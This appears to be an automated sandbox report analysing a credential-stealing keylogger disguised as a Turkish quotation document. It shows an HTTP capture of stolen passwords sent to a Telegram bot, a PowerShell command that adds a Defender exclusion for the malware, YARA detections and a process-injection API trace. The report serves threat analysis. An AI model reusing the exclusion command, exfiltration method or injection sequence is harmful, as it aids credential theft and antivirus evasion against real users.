                                                                                                    Data Ascii: --------------------------8dd31724386f0b9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:971342Date and Time: 09/01/2025 / 13:09
                                                                                                    2025-01-09 18:09:55 UTC388INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Thu, 09 Jan 2025 18:09:55 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 538
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-01-09 18:09:55 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 31 31 32 37 33 37 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 65 6c 47 72 6f 75 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 65 6c 31 30 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 33 32 36 38 32 30 34 31 2c 22 74 69 74 6c 65 22 3a 22 44 65 6c 65 74 65 64 20 47 72 6f 75 70 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 36 31 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":13754,"from":{"id":7611127374,"is_bot":true,"first_name":"DelGroup","username":"Del101bot"},"chat":{"id":-4732682041,"title":"Deleted Group","type":"group","all_members_are_administrators":true},"date":1736446195,"documen


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:13:09:30
                                                                                                    Start date:09/01/2025
                                                                                                    Path:C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                                    Imagebase:0xdc0000
                                                                                                    File size:1'082'368 bytes
                                                                                                    MD5 hash:A4A64F5E476F06B0F9258EDBE1AEF13C
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:13:09:31
                                                                                                    Start date:09/01/2025
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                                    Imagebase:0x60000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:13:09:31
                                                                                                    Start date:09/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff75da10000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:13:09:31
                                                                                                    Start date:09/01/2025
                                                                                                    Path:C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                                    Imagebase:0x240000
                                                                                                    File size:1'082'368 bytes
                                                                                                    MD5 hash:A4A64F5E476F06B0F9258EDBE1AEF13C
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:13:09:31
                                                                                                    Start date:09/01/2025
                                                                                                    Path:C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                                    Imagebase:0x700000
                                                                                                    File size:1'082'368 bytes
                                                                                                    MD5 hash:A4A64F5E476F06B0F9258EDBE1AEF13C
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2529235604.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:9.6%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:209
                                                                                                      Total number of Limit Nodes:8
                                                                                                      execution_graph 49577 7b782a7 49578 7b78114 49577->49578 49578->49577 49579 7b78299 49578->49579 49582 7b79568 49578->49582 49587 7b79558 49578->49587 49583 7b7957d 49582->49583 49592 7b79656 49583->49592 49612 7b79599 49583->49612 49584 7b7958f 49584->49579 49588 7b79568 49587->49588 49590 7b79656 12 API calls 49588->49590 49591 7b79599 12 API calls 49588->49591 49589 7b7958f 49589->49579 49590->49589 49591->49589 49593 7b795e4 49592->49593 49594 7b79659 49592->49594 49599 7b795ca 49593->49599 49631 7b79dda 49593->49631 49635 7b79f5b 49593->49635 49640 7b79ebd 49593->49640 49645 7b79bfe 49593->49645 49650 7b79a96 49593->49650 49654 7b79aec 49593->49654 49661 7b79fcd 49593->49661 49668 7b79e8d 49593->49668 49673 7b79f8f 49593->49673 49678 7b79ba2 49593->49678 49683 7b79d84 49593->49683 49690 7b7a165 49593->49690 49695 7b7a378 49593->49695 49702 7b79c58 49593->49702 49707 7b79db9 49593->49707 49712 7b79cb9 49593->49712 49594->49584 49599->49584 49613 7b795c2 49612->49613 49614 7b795ca 49613->49614 49615 7b79a96 2 API calls 49613->49615 49616 7b79bfe 2 API calls 49613->49616 49617 7b79ebd 2 API calls 49613->49617 49618 7b79f5b 2 API calls 49613->49618 49619 7b79dda 2 API calls 49613->49619 49620 7b79cb9 6 API calls 49613->49620 49621 7b79db9 2 API calls 49613->49621 49622 7b79c58 2 API calls 49613->49622 49623 7b7a378 4 API calls 49613->49623 49624 7b7a165 2 API calls 49613->49624 49625 7b79d84 4 API calls 49613->49625 49626 7b79ba2 2 API calls 49613->49626 49627 7b79f8f 2 API calls 49613->49627 49628 7b79e8d 2 API calls 49613->49628 49629 7b79fcd 4 API calls 49613->49629 49630 7b79aec 4 API calls 49613->49630 49614->49584 49615->49614 49616->49614 49617->49614 49618->49614 49619->49614 49620->49614 49621->49614 49622->49614 49623->49614 49624->49614 49625->49614 49626->49614 49627->49614 49628->49614 49629->49614 49630->49614 49721 7b77a70 49631->49721 49725 7b77a68 49631->49725 49632 7b79e10 49636 7b79e9f 49635->49636 49729 7b773f0 49636->49729 49733 7b773e8 49636->49733 49637 7b7a4b5 49641 7b79c10 49640->49641 49737 7b77b60 49641->49737 49741 7b77b5a 49641->49741 49642 7b7a18e 49642->49642 49646 7b79c27 49645->49646 49648 7b77b60 ReadProcessMemory 49646->49648 49649 7b77b5a ReadProcessMemory 49646->49649 49647 7b7a18e 49648->49647 49649->49647 49745 7b77cec 49650->49745 49749 7b77cf8 49650->49749 49655 7b79af4 49654->49655 49656 7b79b06 49655->49656 49659 7b77a70 WriteProcessMemory 49655->49659 49660 7b77a68 WriteProcessMemory 49655->49660 49753 7b7a6a2 49655->49753 49758 7b7a6b0 49655->49758 49656->49599 49659->49655 49660->49655 49663 7b79af4 49661->49663 49662 7b79b06 49662->49599 49663->49662 49664 7b77a70 WriteProcessMemory 49663->49664 49665 7b77a68 WriteProcessMemory 49663->49665 49666 7b7a6a2 2 API calls 49663->49666 49667 7b7a6b0 2 API calls 49663->49667 49664->49663 49665->49663 49666->49663 49667->49663 49669 7b79e93 49668->49669 49671 7b773f0 ResumeThread 49669->49671 49672 7b773e8 ResumeThread 49669->49672 49670 7b7a4b5 49671->49670 49672->49670 49674 7b79f93 49673->49674 49771 7b778d0 49674->49771 49775 7b778d8 49674->49775 49675 7b79fae 49679 7b79bae 49678->49679 49681 7b77a70 WriteProcessMemory 49679->49681 49682 7b77a68 WriteProcessMemory 49679->49682 49680 7b7a358 49681->49680 49682->49680 49688 7b7a6a2 2 API calls 49683->49688 49689 7b7a6b0 2 API calls 49683->49689 49684 7b79af4 49684->49683 49685 7b79b06 49684->49685 49686 7b77a70 WriteProcessMemory 49684->49686 49687 7b77a68 WriteProcessMemory 49684->49687 49685->49599 49686->49684 49687->49684 49688->49684 49689->49684 49691 7b7a16b 49690->49691 49692 7b7a18e 49691->49692 49693 7b77b60 ReadProcessMemory 49691->49693 49694 7b77b5a ReadProcessMemory 49691->49694 49693->49692 49694->49692 49697 7b79af4 49695->49697 49696 7b79b06 49696->49599 49697->49696 49698 7b7a6a2 2 API calls 49697->49698 49699 7b7a6b0 2 API calls 49697->49699 49700 7b77a70 WriteProcessMemory 49697->49700 49701 7b77a68 WriteProcessMemory 49697->49701 49698->49697 49699->49697 49700->49697 49701->49697 49703 7b79c68 49702->49703 49705 7b773f0 ResumeThread 49703->49705 49706 7b773e8 ResumeThread 49703->49706 49704 7b7a4b5 49705->49704 49706->49704 49708 7b79f93 49707->49708 49710 7b778d0 Wow64SetThreadContext 49708->49710 49711 7b778d8 Wow64SetThreadContext 49708->49711 49709 7b79fae 49710->49709 49711->49709 49717 7b778d0 Wow64SetThreadContext 49712->49717 49718 7b778d8 Wow64SetThreadContext 49712->49718 49713 7b79af4 49714 7b79b06 49713->49714 49715 7b7a6a2 2 API calls 49713->49715 49716 7b7a6b0 2 API calls 49713->49716 49719 7b77a70 WriteProcessMemory 49713->49719 49720 7b77a68 WriteProcessMemory 49713->49720 49714->49599 49715->49713 49716->49713 49717->49713 49718->49713 49719->49713 49720->49713 49722 7b77ab8 WriteProcessMemory 49721->49722 49724 7b77b0f 49722->49724 49724->49632 49726 7b77a6f WriteProcessMemory 49725->49726 49728 7b77b0f 49726->49728 49728->49632 49730 7b77430 ResumeThread 49729->49730 49732 7b77461 49730->49732 49732->49637 49734 7b773f0 ResumeThread 49733->49734 49736 7b77461 49734->49736 49736->49637 49738 7b77bab ReadProcessMemory 49737->49738 49740 7b77bef 49738->49740 49740->49642 49742 7b77b60 ReadProcessMemory 49741->49742 49744 7b77bef 49742->49744 49744->49642 49746 7b77cf8 CreateProcessA 49745->49746 49748 7b77f43 49746->49748 49748->49748 49750 7b77d81 CreateProcessA 49749->49750 49752 7b77f43 49750->49752 49754 7b7a6b0 49753->49754 49763 7b779b0 49754->49763 49767 7b779a8 49754->49767 49755 7b7a6e4 49755->49655 49759 7b7a6c5 49758->49759 49761 7b779b0 VirtualAllocEx 49759->49761 49762 7b779a8 VirtualAllocEx 49759->49762 49760 7b7a6e4 49760->49655 49761->49760 49762->49760 49764 7b779f0 VirtualAllocEx 49763->49764 49766 7b77a2d 49764->49766 49766->49755 49768 7b779b0 VirtualAllocEx 49767->49768 49770 7b77a2d 49768->49770 49770->49755 49772 7b778d8 Wow64SetThreadContext 49771->49772 49774 7b77965 49772->49774 49774->49675 49776 7b7791d Wow64SetThreadContext 49775->49776 49778 7b77965 49776->49778 49778->49675 49779 1794668 49780 179467a 49779->49780 49781 1794686 49780->49781 49783 1794778 49780->49783 49784 179479d 49783->49784 49788 1794879 49784->49788 49792 1794888 49784->49792 49790 17948af 49788->49790 49789 179498c 49790->49789 49796 17944c4 49790->49796 49794 17948af 49792->49794 49793 179498c 49793->49793 49794->49793 49795 17944c4 CreateActCtxA 49794->49795 49795->49793 49797 1795918 CreateActCtxA 49796->49797 49799 17959db 49797->49799 49799->49799 49822 179b5d8 49823 179b5d9 49822->49823 49826 179b6c0 49823->49826 49824 179b5e7 49827 179b704 49826->49827 49828 179b6e1 49826->49828 49827->49824 49828->49827 49829 179b908 GetModuleHandleW 49828->49829 49830 179b935 49829->49830 49830->49824 49566 5dd9398 49567 5dd93be 49566->49567 49568 5dd9418 49567->49568 49570 7b7a8bf 49567->49570 49573 7b7a8e1 49570->49573 49571 7b7a917 49571->49568 49573->49571 49574 7b76718 49573->49574 49575 7b7abb8 PostMessageW 49574->49575 49576 7b7ac24 49575->49576 49576->49573 49800 7b78160 49802 7b78114 49800->49802 49801 7b78299 49802->49801 49803 7b79568 12 API calls 49802->49803 49804 7b79558 12 API calls 49802->49804 49803->49801 49804->49801 49805 179d960 49806 179d961 49805->49806 49807 179da93 49806->49807 49810 179db31 49806->49810 49814 179db40 49806->49814 49811 179db34 49810->49811 49818 179d470 49811->49818 49815 179db41 49814->49815 49816 179d470 DuplicateHandle 49815->49816 49817 179db6e 49816->49817 49817->49807 49819 179dba8 DuplicateHandle 49818->49819 49821 179db6e 49819->49821 49821->49807 49831 7b7831a 49832 7b78320 49831->49832 49834 7b79568 12 API calls 49832->49834 49835 7b79558 12 API calls 49832->49835 49833 7b78331 49834->49833 49835->49833

                                                                                                      Executed Functions

                                                                                                      Function 075A0040 Relevance: 18.7, Strings: 14, Instructions: 1232COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,q$,q$4cq$4cq$|bq$|bq$|bq$$q$$q$$q$cq$cq$cq$cq
                                                                                                      • API String ID: 0-3032403034
                                                                                                      • Opcode ID: 7271df68fd6a75aec39c2d0c41a18e4aa097c41f66e6c2d93885da9a7a591325
                                                                                                      • Instruction ID: f8bfde2b589d5511b43f79a4c53c9401eb92435bb972de641a8ca47134455c2d
                                                                                                      • Opcode Fuzzy Hash: 7271df68fd6a75aec39c2d0c41a18e4aa097c41f66e6c2d93885da9a7a591325
                                                                                                      • Instruction Fuzzy Hash: 27B22874B102158FDB14DF29C594A69B7F2FF89310F1584AAE84ADB3A1EB31EC81CB51
                                                                                                      Function 01793E40 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Pqq
                                                                                                      • API String ID: 0-1334384951
                                                                                                      • Opcode ID: ee7b38552cbed5c4fcbd80498f98987834b5aa649bccc843490643cd42284a0b
                                                                                                      • Instruction ID: 26522342668a894bfafdf492de5e07dc370c67a9e2af3aa2a696b6dd3eafd654
                                                                                                      • Opcode Fuzzy Hash: ee7b38552cbed5c4fcbd80498f98987834b5aa649bccc843490643cd42284a0b
                                                                                                      • Instruction Fuzzy Hash: 86E1A074E002189FDB54DFA9D984B9DBBB2FF88300F1085A9E409AB355DB31AD85CF51
                                                                                                      Function 01797288 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Pqq
                                                                                                      • API String ID: 0-1334384951
                                                                                                      • Opcode ID: a59a5763e0a911f238dd77ef7cc6d412b01d4728d9abe37f5a07ec4e367e89ed
                                                                                                      • Instruction ID: 42e803b251a9dd61c168e7d0d7dc058e9de7a7e1a5404232290d5938c1a54033
                                                                                                      • Opcode Fuzzy Hash: a59a5763e0a911f238dd77ef7cc6d412b01d4728d9abe37f5a07ec4e367e89ed
                                                                                                      • Instruction Fuzzy Hash: 8FB19074E012189FDB54DFA9D984A9DBBF2FF88300F1481A9D809AB355DB31AD85CF50
                                                                                                      Function 075AD6C0 Relevance: .6, Instructions: 637COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7e366414a58920cd77ca2eb0d1168e62dcdd8fb43cf6f2f8c4cb92aed374fd23
                                                                                                      • Instruction ID: eb918ed59e6511c4aa84b908bb530cfada6279d4dac1b835bfb8e06a5447fcbd
                                                                                                      • Opcode Fuzzy Hash: 7e366414a58920cd77ca2eb0d1168e62dcdd8fb43cf6f2f8c4cb92aed374fd23
                                                                                                      • Instruction Fuzzy Hash: DB421B74B013069FDB14EF68C494AAEBBF6FF89200F55846AE4469B795DB30EC42CB50
                                                                                                      Function 075A53B8 Relevance: .6, Instructions: 629COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 13ea9392674e23983624e1764016a67df924afdd972215512f5daf534ffe54ef
                                                                                                      • Instruction ID: 306e51eb65dfc133481adaacb62239bf0df4af760f02c08baf0117d492632485
                                                                                                      • Opcode Fuzzy Hash: 13ea9392674e23983624e1764016a67df924afdd972215512f5daf534ffe54ef
                                                                                                      • Instruction Fuzzy Hash: 11425BB0A10705DFDB24CF69D584AAEBBF2BF85315F14847AE1468B790EB34E855CB10
                                                                                                      Function 075A2B18 Relevance: .5, Instructions: 459COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3bcc3a7c53fb979f1427737764147e475ad588192359d3ae184f3a78c3967ab
                                                                                                      • Instruction ID: 05cfbffe14665518f674aaed0e2ba2af0d5a50046a561d12affcaef3c84cbe30
                                                                                                      • Opcode Fuzzy Hash: a3bcc3a7c53fb979f1427737764147e475ad588192359d3ae184f3a78c3967ab
                                                                                                      • Instruction Fuzzy Hash: 50F192B1B01216ABDB555F64D8557BEBAB6FBC8710F04843AE806DB344DB31DC82CBA1
                                                                                                      Function 075ACF50 Relevance: .5, Instructions: 451COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 66a002301f8d9b659bd381f96045494594b0860cee9df390828582734bee3dde
                                                                                                      • Instruction ID: f6e270dbc9acdfd953544d53239ec412e3b9de843d6bdce3dbc6c2623a2c0b7b
                                                                                                      • Opcode Fuzzy Hash: 66a002301f8d9b659bd381f96045494594b0860cee9df390828582734bee3dde
                                                                                                      • Instruction Fuzzy Hash: 3B124F74A003069FD714DF68C584AAEBBF2FF89300B55C5AAE5499B366D730ED42CB60
                                                                                                      Function 075A7F20 Relevance: .4, Instructions: 401COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: df59dfedfb96c728dab7152bb2992bbe45738220636600b1736adea5b8d1982b
                                                                                                      • Instruction ID: cba5739b814ff801b55a9e733bfd1e000333b32d82be7fa883f7f76db13bf5e7
                                                                                                      • Opcode Fuzzy Hash: df59dfedfb96c728dab7152bb2992bbe45738220636600b1736adea5b8d1982b
                                                                                                      • Instruction Fuzzy Hash: 52F15F74E102069FDB08DFA8D454AAEBBB6FF88304F148469E416AB395DB31EC46CB51
                                                                                                      Function 075AA0C8 Relevance: .4, Instructions: 389COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a1899d79bc79e1b16b19fa8710aed2b65067960939a61df356abe6c903205d47
                                                                                                      • Instruction ID: bf1239f7471de3d791354de0f7e0e205304bb1ed74a972f1509410d5e7fdb977
                                                                                                      • Opcode Fuzzy Hash: a1899d79bc79e1b16b19fa8710aed2b65067960939a61df356abe6c903205d47
                                                                                                      • Instruction Fuzzy Hash: 24F15AB5A10705EFDB25CF69C484AAEBBF2FF48300F14896AE8469B751DB35E845CB40
                                                                                                      Function 01794B00 Relevance: .2, Instructions: 250COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d7a7bdd50557405b9091e28feed93b91bd9cfd147852915bec9d975f33b3642a
                                                                                                      • Instruction ID: 5fb0b65a81373c06ae08ab9c59075d366cbd6c083934b11d6161a42bae529473
                                                                                                      • Opcode Fuzzy Hash: d7a7bdd50557405b9091e28feed93b91bd9cfd147852915bec9d975f33b3642a
                                                                                                      • Instruction Fuzzy Hash: 9081E6A3F04181EB9F26B4BF6C0E2A501C587EE65CF04C2597762DFBE4E2B6C8418356
                                                                                                      Function 07B71CD8 Relevance: .1, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 157b3230ac5aadd28ec7349781119fda732d23e0538cf7a849c9d475d981eef3
                                                                                                      • Instruction ID: 7b414cb6ccf847ee74316ddca00898fc6d6ecd7dd98109ade0f4a8d03c17090c
                                                                                                      • Opcode Fuzzy Hash: 157b3230ac5aadd28ec7349781119fda732d23e0538cf7a849c9d475d981eef3
                                                                                                      • Instruction Fuzzy Hash: 892127B1D046188BEB18CFA6D9443EEFBF6AFC9300F14C06AD41966254DB750545CFA0
                                                                                                      Function 07B71CE8 Relevance: .1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
